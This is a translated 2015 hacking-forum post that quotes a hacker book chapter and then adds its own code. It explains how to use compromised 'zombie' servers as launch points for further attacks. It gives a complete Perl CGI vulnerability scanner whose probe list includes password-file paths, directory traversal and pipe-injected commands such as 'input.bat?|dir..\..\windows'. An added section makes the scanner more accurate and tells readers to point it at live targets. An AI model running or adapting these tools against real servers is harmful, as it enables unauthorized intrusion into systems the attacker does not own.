王旭东 posted on 2015-1-5 16:24

Writing tools: Perl programs




    Many hacker tutorials use the term "肉鸡" (literally "broiler", i.e. a zombie host). What exactly does it refer to? It refers to a system that has exploitation value. For example, once the system the hacker uses, call it System, has attacked and taken control of a machine called Clink, the controlled Clink is called a 肉鸡, and the hacker can continue attacking other systems directly from it. If Clink has permission to interpret Perl programs, then to the hacker it already has basic exploitation value, because Perl can be used to write many offensive programs, and running those programs on the server Clink is obviously much faster, and much safer, than running them on System.
    At http://www.hack-net.com/ you can find many scanners and attack programs written in Perl. Upload them to a server that has Perl permission, change the file's attribute value to executable, and then access them directly through a browser to carry out the corresponding operation.
    Earlier in this book, when writing the e-mail bomb, this kind of program was introduced briefly; now let us look at how to write vulnerability-scanning software in Perl:
#!/usr/bin/perl
# ============================================================================
# CGI vulnerability scanner
# ============================================================================
use strict;
use warnings;
use Socket;

my $version     = "Cgi Scanner v1.0";
my $verbosemode = "n";     # set to "y" to also print the paths that were not found
my $storelogs   = "no";    # set from the "Enable Logging?" prompt

# Label => path to request. Labels that were duplicated in the original list
# would collapse into a single hash entry, so they are made unique here. The
# values are single-quoted so that backslashes and "$DATA" are sent literally.
my %exploits = (
    'VTI PVT service.pwd'            => '/_vti_pvt/service.pwd',
    'VTI PVT administrators.pwd'     => '/_vti_pvt/administrators.pwd',
    'VTI BIN'                        => '/_vti_bin/shtml.exe',
    'un1g1.1'                        => '/cgi-bin/unlg1.1',
    'gH.cgi'                         => '/cgi-bin/gH.cgi',
    'nph-test-cgi(Bugtraq ID 686)'   => '/cgi-bin/nph-test-cgi',
    'nph-publish'                    => '/cgi-bin/nph-publish',
    'Handler(Bugtraq ID 380)'        => '/cgi-bin/handler',
    'Webdist.cgi(Bugtraq ID 374)'    => '/cgi-bin/webdist.cgi',
    'faxsurvey'                      => '/cgi-bin/faxsurvey',
    'wwwboard.cgi'                   => '/cgi-bin/wwwboard.cgi',
    'campas'                         => '/cgi-bin/campas',
    'AT-admin.cgi'                   => '/cgi-bin/AT-admin.cgi',
    'filemail.pl'                    => '/cgi-bin/filemail.pl',
    'info2www'                       => '/cgi-bin/info2www',
    'files.pl'                       => '/cgi-bin/files.pl',
    'Finger'                         => '/cgi-bin/finger',
    'classifieds.cgi'                => '/cgi-bin/classifieds.cgi',
    'environ.cgi'                    => '/cgi-bin/environ.cgi',
    'Webbbs.cgi(Bugtraq ID 803)'     => '/cgi-bin/webbbs.cgi',
    'whois_raw.cgi(Bugtraq ID 304)'  => '/cgi-bin/whois_raw.cgi',
    'Anyboard.cgi'                   => '/cgi-bin/AnyBoard.cgi',
    '/scripts/issadmin/bdir.htr'     => '/scripts/issadmin/bdir.htr',
    'Msadc'                          => '/msadc/Samples/SELECTOR/showcode.asp',
    '/iisadmpwd/aexp2.htr'           => '/iisadmpwd/aexp2.htr',
    '/iisadmpwd/anot3.htr'           => '/iisadmpwd/anot3.htr',
    '5daydatacopier.cgi'             => '/cgi-bin/day5datacopier.cgi',
    'passwd.txt'                     => '/cgi-bin/passwd.txt',
    'password'                       => '/cgi-bin/password',
    '/etc/group'                     => '/etc/group',
    '/~root'                         => '/~root',
    'Upload.pl'                      => '/cgi-bin/upload.pl',
    'formmail.pl'                    => '/cgi-bin/formmail.pl',
    'sendform.cgi'                   => '/cgi-bin/sendform.cgi',
    '_AuthChangeUrl'                 => '/cgi-bin/_AuthChangeUrl',
    'No-such-file.pl'                => '/scripts/no-such-file.pl',
    '/......'                        => '/....../',
    'Too long!'                      => '/.html/............./config.sys',
    '/_vti_pvt/shtml.exe'            => '/_vti_pvt/shtml.exe',
    '/_vti_inf.html'                 => '/_vti_inf.html',
    'cgi-shl/win-c-sample.exe'       => '/cgi-shl/win-c-sample.exe',
    'default.asp'                    => '/default.asp',
    'Server%20logfile'               => '/server%20logfile',
    'dcmcfg.nsf'                     => '/domcfg.nsf/?open',
    'Webhits.exe'                    => '/scripts/samples/search/webhits.exe',
    'fpexplore.exe'                  => '/cgi-bin/fpexplore.exe',
    'gueryhit.htm'                   => '/samples/search/queryhit.htm',
    'ss.cfg'                         => '/ss.cfg',
    'visadmin.exe'                   => '/cgi-bin/visadmin.exe?user=guest',
    'input.bat(Bugtraq ID 762)'      => '/cgi-bin/input.bat?|dir..\..\windows',
    'indes.asl::$DATA'               => '/index.asp::$DATA',
    '//../../config.sys'             => '//../../config.sys',
    '/../../config.sys'              => '/../../config.sys',
    'main.asp%81'                    => '/main.asp%81',
    '/adsamples/config/site.csc'     => '/adsamples/config/site.csc',
    'isn.dll'                        => '/scripts/iisadmin/ism.dll?http/dir',
    'Search.cgi(Bugtraq ID 921)'     => '/cgi-bin/search.cgi',
    'bb-hist.sh(Bugtraq ID 142)'     => '/cgi-bin/bb-hist.sh',
    'kcms_configure(Bugtraq ID 452)' => '/usr/openwin/bin/kcms_configure',
    'Bugtraq ID 162'                 => '/cgi-bin/s97_cgi s97r_cgi tasmgr',
    'ppdscgi.exe(Bugtraq ID 491)'    => '/cgi-bin/ppdscgi.exe',
    'dfire.cgi(Bugtraq ID 564)'      => '/cgi-bin/dfire.cgi',
    'guestbook.pl(Bugtraq ID 776)'   => '/cgi-bin/guestbook.pl',
    'Anyform.cgi(Bugtraq ID 719)'    => '/cgi-bin/AnyForm.cgi',
    'w3-msql(Bugtraq ID 591, 898)'   => '/cgi-bin/w3-msql',
    'Bugtraq ID 770 (tst.bat)'       => '/cgi-bin/tst.bat|type%20c:\file.txt',
    'Bugtraq ID 770 (alibaba.pl)'    => '/cgi-bin/alibaba.pl|dir',
    'status.cgi(Bugtraq ID 914)'     => '/cgi-bin/status.cgi',
    'FormHandler 1.0, 2.0(Bugtraq ID 799, 798)' => '/cgi-bin/FormHandler.cgi',
    'webwho.pl(Bugtraq ID 892)'      => '/cgi-bin/webwho.pl',
    'carbo.dll'                      => '/carbo.dll',
);

&menu();

# Print a prompt and return one chomped line from standard input ('' on EOF).
sub ask {
    my ($prompt) = @_;
    print $prompt;
    my $line = <STDIN>;
    return '' unless defined $line;
    chomp $line;
    return $line;
}

# Print an error and leave (the original called this but never defined it).
sub dienice {
    my ($msg) = @_;
    print "$msg\n";
    exit 1;
}

sub menu {
    while (1) {
        print "\n\n";
        print "                        $version\n\n";
        print "         Based on source code of [ Infinity Scanner v1.3 ]\n\n";
        print "                        1) Cgi Sonar\n";
        print "                        2) About Cgi Sonar\n";
        print "                        3) Exploit Info\n";
        print "                        4) Help\n";
        print "                        5) Exit\n";
        my $selection = ask("Command: ");
        if    ($selection eq "1") { &cgiscanner() }
        elsif ($selection eq "2") { &infomessage() }
        elsif ($selection eq "3") { &exploitinfo() }
        elsif ($selection eq "4") { &helpmessage() }
        elsif ($selection eq "5") { &exitcgisonar() }
    }
}

sub cgiscanner {
    my $usehostlist = ask("\nScan hosts from a server list file? (yes/no): ");
    if ($usehostlist eq "yes") { &exploituselist(); }
    else                       { &exploitnouselist(); }
}

sub exploituselist {
    my $hostlist = ask("\nServerlist Filename: ");
    open(my $inf, '<', $hostlist) or &dienice("Can't open $hostlist: $!");
    my @hostsarray = <$inf>;
    close($inf);
    $storelogs = ask("\nEnable Logging? (Saved as gotcha.log) yes/no: ");
    foreach my $host (@hostsarray) {
        chomp($host);
        next if $host eq '';
        &cgiscannerloop($host);
    }
}

sub exploitnouselist {
    my $host = ask("\nHost: ");
    $storelogs = ask("\nEnable Logging? (Saved as gotcha.log) yes/no: ");
    &cgiscannerloop($host);
}

sub cgiscannerloop {
    my ($host) = @_;
    my $number = 0;
    # inet_aton() accepts either a dotted-quad address or a host name to resolve
    my $serverIP = inet_aton($host);
    if (!defined $serverIP) {
        print "Can't resolve host $host!\n";
        return;
    }
    my $serverAddr = sockaddr_in(80, $serverIP);
    print "\n\nChecking $host for known exploits:\n\n";
    foreach my $key (sort keys %exploits) {
        socket(my $client, PF_INET, SOCK_STREAM, getprotobyname('tcp'))
            or &dienice("socket: $!");
        if (connect($client, $serverAddr)) {
            send($client, "GET $exploits{$key} HTTP/1.0\r\n\r\n", 0);
            my $check = <$client>;    # status line, e.g. "HTTP/1.1 200 OK"
            my ($http, $code) = defined $check ? split(/ /, $check, 3) : ();
            if (defined $code && $code eq "200") {
                print "Exploit Found: $key\nLocation: $exploits{$key}\n\n";
                $number++;
                if ($storelogs eq "yes") {
                    open(my $gotcha, '>>', 'gotcha.log')
                        or &dienice("Couldn't open gotcha.log for writing. Please make sure the file exists and is writable.");
                    print $gotcha "Exploit Found: $key\nServer: $host\nLocation: $exploits{$key}\n\n";
                    close($gotcha);
                }
            }
            elsif ($verbosemode eq "y") {
                print "$key Exploits Not Found\n";
            }
        }
        else {
            print "Can't connect to $host:80: $!\n";
        }
        close($client);
    }
    if ($number == 0) { print "No exploitable holes found on host $host\n"; }
}

sub infomessage {
    print "               Cgi Scanner v1.0 by Maxview\n\n";
    ask("Press enter to continue...");
}

sub exploitinfo {
    print "                        Exploit Info\n\n";
    print " If you are having trouble finding info on the exploits found\n";
    print " on a certain host you have scanned... I strongly suggest you \n";
    print " look for info on the exploits found on a host at the following\n";
    print " sites... http://www.securityfocus.com, www.rootshell.com, or\n";
    print " http://packetstorm.securify.com... If you are confused about\n";
    print " the Bugtraq ID's... Then simply go to http://www.securityfocus.com\n";
    print " /level2/bottom.html?go=vulnerabilities and click on the Bugtraq ID\n";
    print " tab and type in the ID number in the blank box... All the info\n";
    print " you will need will be in the newly loaded page...\n\n";
    ask("Press enter to continue...");
}

sub helpmessage {
    print "                        Help\n\n";
    print "                  Cgi Scanner command's\n\n";
    print " 1) Cgi Scanner- Scans for known Cgi exploits on a remote host...\n";
    print " 2) About Cgi Scanner- Informs you about Cgi Scanner...\n";
    print " 3) Help- Informs you on certain aspects of Cgi Scanner...\n";
    print " 4) Exit- It simply exits you out of the Cgi Scanner...\n\n";
    print "                     Sub command's\n\n";
    print " Host:- Allows you to type in the IP of the host you wish\n";
    print " to scan (e.g. 127.0.0.1)...\n";
    print " Enable Logging- Logs exploits found, Host IP, etc...\n";
    print "            Thank you for using Cgi Scanner\n\n";
    ask("Press enter to continue...");
}

sub exitcgisonar { exit 0; }

    The program looks complicated, but in fact its principle is the same as that of a vulnerability scanner written in C: first establish a connection with the server through a socket, then send a GET request to query whether the specified file exists, and if it does, report the file's location. This program defines many different vulnerabilities, and as a learner you should work hard to master the principles and exploitation methods of these vulnerabilities.
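Added example (my own code, not from the book excerpt or the poster above). The scanner treats every HTTP 200 as a found file, which gives false positives on servers that answer 200 with a custom "not found" page for any path. This version, in Perl like the page's tool, parses the status line properly, sends a Host header so name-based virtual hosts answer, applies a socket timeout, and compares each probe against a baseline request for a path that cannot exist. The body-length comparison against the baseline, the 5-second timeout and the `/no-such-path-...` prefix are assumptions of this example, and the three responses at the bottom are constructed so the decision logic can be run offline.

```perl
#!/usr/bin/perl
# Added example: a baseline-aware "is this path really there?" check.
use strict;
use warnings;
use IO::Socket::INET;

# Return the numeric status code from a raw HTTP response (or just its head),
# or undef when there is no valid status line.
sub parse_status {
    my ($raw) = @_;
    return undef unless defined $raw;
    return $1 + 0 if $raw =~ m{\AHTTP/\d\.\d\s+(\d{3})(?:\s|\z)};
    return undef;
}

# Split a raw response into (status code, body length).
sub split_response {
    my ($raw) = @_;
    my ($head, $body) = split /\r?\n\r?\n/, $raw, 2;
    return (parse_status($head), length($body // ''));
}

# Decide whether a probe really hit. A plain "200 means found" rule is fooled
# by servers that return 200 for every path; so a 200 whose body has the same
# size as the reply for a bogus path is treated as the catch-all page, not as
# a finding. (Length-based heuristic: an assumption of this example.)
sub probe_hit {
    my ($code, $body_len, $base_code, $base_len) = @_;
    return 0 unless defined $code && $code == 200;
    if (defined $base_code && $base_code == 200
        && defined $base_len && $base_len == $body_len) {
        return 0;
    }
    return 1;
}

# One HTTP/1.0 GET with a Host header and a 5-second timeout (assumed value).
# Returns (status code, body length); (undef, 0) on failure. Network I/O, so
# it is not exercised by the offline demo below.
sub fetch {
    my ($host, $port, $path) = @_;
    my $sock = IO::Socket::INET->new(
        PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Timeout => 5,
    ) or return (undef, 0);
    print $sock "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
    my $raw = do { local $/; <$sock> };
    close $sock;
    return (undef, 0) unless defined $raw;
    return split_response($raw);
}

# Scan a list of paths on one host, taking the baseline first.
sub scan {
    my ($host, $port, @paths) = @_;
    my $bogus = sprintf '/no-such-path-%08x', int rand 0xFFFFFFFF;  # hypothetical prefix
    my ($base_code, $base_len) = fetch($host, $port, $bogus);
    my @hits;
    for my $path (@paths) {
        my ($code, $len) = fetch($host, $port, $path);
        push @hits, $path if probe_hit($code, $len, $base_code, $base_len);
    }
    return @hits;
}

# Offline demonstration on constructed responses (no network needed).
my $catchall = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>custom not found</html>";
my $real     = "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\nroot:x:0:0:root:/:/bin/sh\n";
my $missing  = "HTTP/1.0 404 Not Found\r\n\r\n";

# The catch-all page stands in for what the bogus baseline path would return.
my ($base_code, $base_len) = split_response($catchall);
for my $case (["real file", $real], ["404 reply", $missing], ["catch-all page", $catchall]) {
    my ($name, $raw) = @$case;
    my ($code, $len) = split_response($raw);
    printf "%-15s code=%s len=%d hit=%d\n",
        $name, $code // 'none', $len, probe_hit($code, $len, $base_code, $base_len);
}
```

Against a live target, call scan('host', 80, values %exploits) with the path list from the scanner above; the offline demo shows the 404 and the catch-all 200 being rejected while the genuine file is still reported. Any method that only looks at the status code, including the book's scanner, should be read with this failure mode in mind.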


风霜 posted on 2015-1-5 17:39

This is way too messy.

yyz219 posted on 2015-1-5 19:40

manbajie posted on 2015-1-6 20:29

Aha, this is a bit…

minisys posted on 2015-2-1 21:28

Bumping for the OP; anyone who writes a vulnerability scanner is a real expert.